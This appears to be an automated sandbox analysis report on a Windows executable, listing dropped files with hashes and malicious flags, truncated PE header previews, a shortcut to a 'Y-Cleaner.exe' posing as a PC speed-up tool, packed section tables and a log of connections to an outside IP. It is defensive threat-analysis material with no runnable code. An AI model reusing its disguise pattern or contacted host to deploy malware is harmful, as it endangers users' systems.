                                                SSDEEP:192:R6l7wVeJuA6cf6YN5SUbgmfyupDp89bEAsfRsm:R6lXJB686YTSUbgmfylETfP
                                                MD5:475AFA45DD2B6F210E7C9BEB051C9ABD
                                                SHA1:53E897CE298A919FB54817BDE2B5FC386008AFA8
                                                SHA-256:D6A46402F62923A2C2EE40A950E51564F97D11B67FFA0AC2B138E83AD4873050
                                                SHA-512:7A94B9C2441DF590256D1E09A39989E56ADEA4352C69A85E7B884949E9B4DB4784E48DFB103CB5220AA1F6485B70E9DBE0BCC942EE5F4FBF51977A380F1F468A
                                                Malicious:false
                                                Reputation:low
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.3.2.<./.P.i.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4680
                                                Entropy (8bit):4.466902524607603
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsXJg77aI9B2WpW8VYqYm8M4JoRF2WwWsj+q8vVF1j2VvMzufd:uIjf5I7rX7V2JUsjKJj3zufd
                                                MD5:D1A63E218B4C2F679EE30A0E7AF739FB
                                                SHA1:4F5A3CB75E60910F83EFBAD51FA6DC884F10142B
                                                SHA-256:08FF3C4203671081E64C6B28D182095DEAABD75FDC34CD0047F51C47A1B42870
                                                SHA-512:76F28CA2A7CD519C3FCED6900B8E3EA1AC88D1504BBC5C65A12F86780951BC411DCB7A202269F872FEF57A6A860DF36F7F5CDD6E62F916D79FB53F6561DDB819
                                                Malicious:false
                                                Reputation:low
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="639777" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):242176
                                                Entropy (8bit):6.47050397947197
                                                Encrypted:false
                                                SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Joe Sandbox View:
                                                • Filename: tXEKP1ThBP.exe, Detection: malicious, Browse
                                                • Filename: hvm4oOzDaX.exe, Detection: malicious, Browse
                                                • Filename: 7JKssbjRDa.exe, Detection: malicious, Browse
                                                • Filename: dI3n4LSHB7.exe, Detection: malicious, Browse
                                                • Filename: 8V0INSl0E2.exe, Detection: malicious, Browse
                                                • Filename: BEd2lJRXFM.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                Reputation:high, very likely benign file
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...
                                                Process:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:V:V
                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:0
                                                Process:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:V:V
                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                Malicious:false
                                                Preview:0
                                                Process:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:V:V
                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                Malicious:false
                                                Preview:0
                                                Process:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):97296
                                                Entropy (8bit):7.9982317718947025
                                                Encrypted:true
                                                SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                                MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                                SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                                SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                                SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                                Malicious:false
                                                Process:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):21
                                                Entropy (8bit):3.880179922675737
                                                Encrypted:false
                                                SSDEEP:3:gFsR0GOWW:gyRhI
                                                MD5:408E94319D97609B8E768415873D5A14
                                                SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                                SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                                SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                                Malicious:false
                                                Preview:9tKiK3bsYm4fMuK47Pk3s
                                                Process:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):1502720
                                                Entropy (8bit):7.646111739368707
                                                Encrypted:false
                                                SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 75%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.
                                                Process:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):242176
                                                Entropy (8bit):6.47050397947197
                                                Encrypted:false
                                                SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Process:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):1502720
                                                Entropy (8bit):7.646111739368707
                                                Encrypted:false
                                                SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 75%
                                                Process:C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Dec 20 14:55:13 2024, mtime=Fri Dec 20 14:55:13 2024, atime=Fri Dec 20 14:55:13 2024, length=1502720, window=hide
                                                Category:modified
                                                Size (bytes):2124
                                                Entropy (8bit):3.8916513920052944
                                                Encrypted:false
                                                SSDEEP:24:8xsuAsuU5HR2YeRpgKD0vgYcAdiYvNV/uLyuuBZFLuur2pFUwqygm:8xoUHR2YeR+gyAYvNV/IyuyZhuHFmyg
                                                MD5:D8FEE144495717E0601FD845245300EA
                                                SHA1:5C393331D1ED40D3A8CD3148C9D119213296304A
                                                SHA-256:9623BFD10582A875ED3C9F028694DF8D01F3E8C397F76D6EEC501A424A77F4D4
                                                SHA-512:7EDE693E9E554EDCEE50CB08A2CB13010DF0B207AFB65092B3E026ADEC9B02857076634E019845D6D37BAE53F5476AA378B341DC36B561E2403FFC163F85461C
                                                Malicious:false
                                                Preview:L..................F.@.. ....I...R...I...R...I...R..........................$.:..DG..Yr?.D..U..k0.&...&......Qg.*_...m.xS.R..W5...R......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y.~..........................3*N.A.p.p.D.a.t.a...B.P.1......Y.~..Local.<......EW.=.Y.~..........................7...L.o.c.a.l.....N.1......Y.~..Temp..:......EW.=.Y.~...........................N..T.e.m.p.....`.1......Y.~..VWWEWT~1..H......Y.~.Y.~.....&.....................e..V.w.w.e.W.t.d.D.5.C.J.....h.2......Y.~ .Y-CLEA~1.EXE..L......Y.~.Y.~.....'....................`S..Y.-.C.l.e.a.n.e.r...e.x.e.......n...............-.......m...........0;.{.....C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r./.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.V.w.w.e.W.t.d.D.5.C.J.\.Y.-.C.l.e.a.n.e.r...e.x.e.>.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.V.w.w.e.W.t.d.D.5.C.J.\.Y.-.C.l.e.a.n.e.r...e.x.e...
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:MS Windows registry file, NT/2000 or above
                                                Category:dropped
                                                Size (bytes):1835008
                                                Entropy (8bit):4.416698016683499
                                                Encrypted:false
                                                SSDEEP:6144:Pcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNS5+:0i58oSWIZBk2MM6AFBYo
                                                MD5:16F6BC2596C7FB785257C160910DD69A
                                                SHA1:FB680C29856D076B0E5207D94855FCC11BD46EE3
                                                SHA-256:8916887B63BD20E9D706823652968A7F82E015DB9FC5B3FAFDF167579DBE2F3E
                                                SHA-512:CB28A16AB518309D12FB17883CDB706EC5493276AE9F0C4518ADFA86CF29627F63D85DC47A30F7310DBA743484E290F7D7210453CC414F9B8E40F0F95010F2B9
                                                Malicious:false
                                                Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..+..R................................................................................................................................................................................................................................................................................................................................................<.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.940972144959574
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:zSmMqGGeVy.exe
                                                File size:1'903'104 bytes
                                                MD5:83aa26bd8755e994141c4b6d525307ba
                                                SHA1:1cc2485520840247010cd5a2a6f6ba69924a8da5
                                                SHA256:0e5c004b6ac8fd180951d14352e8eb0e4b9b3d4e32dbeaa194a7af7c77d3b4d7
                                                SHA512:ad96208839e796d6572385c838141d2b96c55388afa21d3eeca8a11135f51fd49c5f80a5de9aa1c0925cb3fea9c626bb9a42e16556eaabc2baaf727c58cf3fdb
                                                SSDEEP:49152:0vscG7g87Ql1DHv/4H04CEbCeVPsua1wvzvV/gs:Q8EGCEbvkuiwrvV
                                                TLSH:2E95334365DDDE37E9540030552913F3AB6AFF03205702372A5FA72ACE2F38959AB689
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i..............nG@......ZR......ZC......ZU......................Z\......ZB......ZG.....Rich....................PE..L....,.e...
                                                Icon Hash:e7a99a8a8651790c
                                                Entrypoint:0xc43000
                                                Entrypoint Section:.taggant
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                Time Stamp:0x65B12CA8 [Wed Jan 24 15:28:40 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:0
                                                File Version Major:5
                                                File Version Minor:0
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:0
                                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                Instruction
                                                jmp 00007F9DF4C6E79Ah
                                                Programming Language:
                                                • [C++] VS2008 build 21022
                                                • [ASM] VS2008 build 21022
                                                • [ C ] VS2008 build 21022
                                                • [IMP] VS2005 build 50727
                                                • [RES] VS2008 build 21022
                                                • [LNK] VS2008 build 21022
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x41805b | 0x6f | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x40d000 | 0xaea0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x83b264 | 0x18 | vrjcgfkr |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| | 0x1000 | 0x40c000 | 0x24e00 | 4cf1ce91c87f3157cb14965a35d9fd95 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x40d000 | 0xaea0 | 0x7000 | 7b67b0c46dbed2a0a52d3a2fa6f866a3 | False | 0.9677385602678571 | data | 7.897532259921152 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x418000 | 0x1000 | 0x200 | b8539b83d0b3f253ed2a56b71af0554b | False | 0.154296875 | data | 1.085758102617974 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x419000 | 0x288000 | 0x200 | 9e0ec49b4f00f3b15b8732aa9cf62268 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| vrjcgfkr | 0x6a1000 | 0x1a1000 | 0x1a1000 | ccab72a98e632a0c93ecbc69cf1f6b23 | False | 0.9899012430680456 | data | 7.947994555821212 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| zykttmzm | 0x842000 | 0x1000 | 0x600 | f04f6fd6a213b9a77fd4df6aaef3c25a | False | 0.5670572916666666 | data | 4.980166399089074 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x843000 | 0x3000 | 0x2200 | a5e40ea09afe696fb78aa2555b565636 | False | 0.05652573529411765 | DOS executable (COM) | 0.6642322831812674 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| RT_ICON | 0x83b2c4 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkmen | Turkmenistan | 0.7971748400852878 |
| RT_ICON | 0x83c16c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkmen | Turkmenistan | 0.7838447653429603 |
| RT_ICON | 0x83ca14 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkmen | Turkmenistan | 0.7200460829493087 |
| RT_ICON | 0x83d0dc | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkmen | Turkmenistan | 0.740606936416185 |
| RT_ICON | 0x83d644 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Turkmen | Turkmenistan | 0.6840248962655602 |
| RT_ICON | 0x83fbec | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Turkmen | Turkmenistan | 0.7345215759849906 |
| RT_ICON | 0x840c94 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Turkmen | Turkmenistan | 0.7622950819672131 |
| RT_ICON | 0x84161c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Turkmen | Turkmenistan | 0.8111702127659575 |
| RT_STRING | 0x413c80 | 0x330 | data | | | 0.8419117647058824 |
| RT_STRING | 0x413fb0 | 0x170 | data | | | 0.15 |
| RT_STRING | 0x414120 | 0x620 | empty | | | 0 |
| RT_STRING | 0x414740 | 0x762 | empty | | | 0 |
| RT_STRING | 0x414ea4 | 0x852 | empty | | | 0 |
| RT_STRING | 0x4156f8 | 0x726 | empty | | | 0 |
| RT_STRING | 0x415e20 | 0x658 | empty | | | 0 |
| RT_STRING | 0x416478 | 0x6c0 | empty | | | 0 |
| RT_STRING | 0x416b38 | 0x638 | empty | | | 0 |
| RT_STRING | 0x417170 | 0x88a | empty | | | 0 |
| RT_ACCELERATOR | 0x4179fc | 0x20 | empty | | | 0 |
| RT_GROUP_ICON | 0x841a84 | 0x76 | data | Turkmen | Turkmenistan | 0.6610169491525424 |
| RT_VERSION | 0x841afa | 0x1b4 | data | | | 0.5711009174311926 |
| RT_MANIFEST | 0x841cae | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535 |
| DLL | Import |
| kernel32.dll | lstrcpy |
| Language of compilation system | Country where language is spoken |
| Turkmen | Turkmenistan |
                                                Dec 20, 2024 16:54:58.360722065 CET4987980192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:58.360944986 CET4988880192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:58.480492115 CET8049888185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:58.480581999 CET4988880192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:58.480787039 CET8049879185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:58.480931997 CET4988880192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:58.480942965 CET4987980192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:54:58.600795031 CET8049888185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:59.827917099 CET8049888185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:54:59.827974081 CET4988880192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:02.302061081 CET4988880192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:02.302364111 CET4989780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:02.422389030 CET8049897185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:02.422468901 CET4989780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:02.422771931 CET8049888185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:02.422833920 CET4988880192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:02.423856020 CET4989780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:02.543394089 CET8049897185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:03.762080908 CET8049897185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:03.762208939 CET4989780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:06.405314922 CET4989780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:06.525332928 CET8049897185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:06.525399923 CET4989780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:06.847295046 CET4990880192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:06.967056990 CET8049908185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:06.967231035 CET4990880192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:06.967533112 CET4990880192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:07.087109089 CET8049908185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:08.487539053 CET8049908185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:08.487577915 CET8049908185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:08.487598896 CET8049908185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:08.487637997 CET4990880192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:08.487682104 CET4990880192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:08.488054037 CET8049908185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:08.488068104 CET8049908185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:08.488080978 CET8049908185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:08.488116980 CET4990880192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:08.488151073 CET4990880192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:08.488184929 CET8049908185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:08.488255978 CET8049908185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:08.488270044 CET8049908185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:08.488282919 CET8049908185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:08.488303900 CET4990880192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:08.488346100 CET4990880192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:08.607319117 CET8049908185.156.73.23192.168.2.7
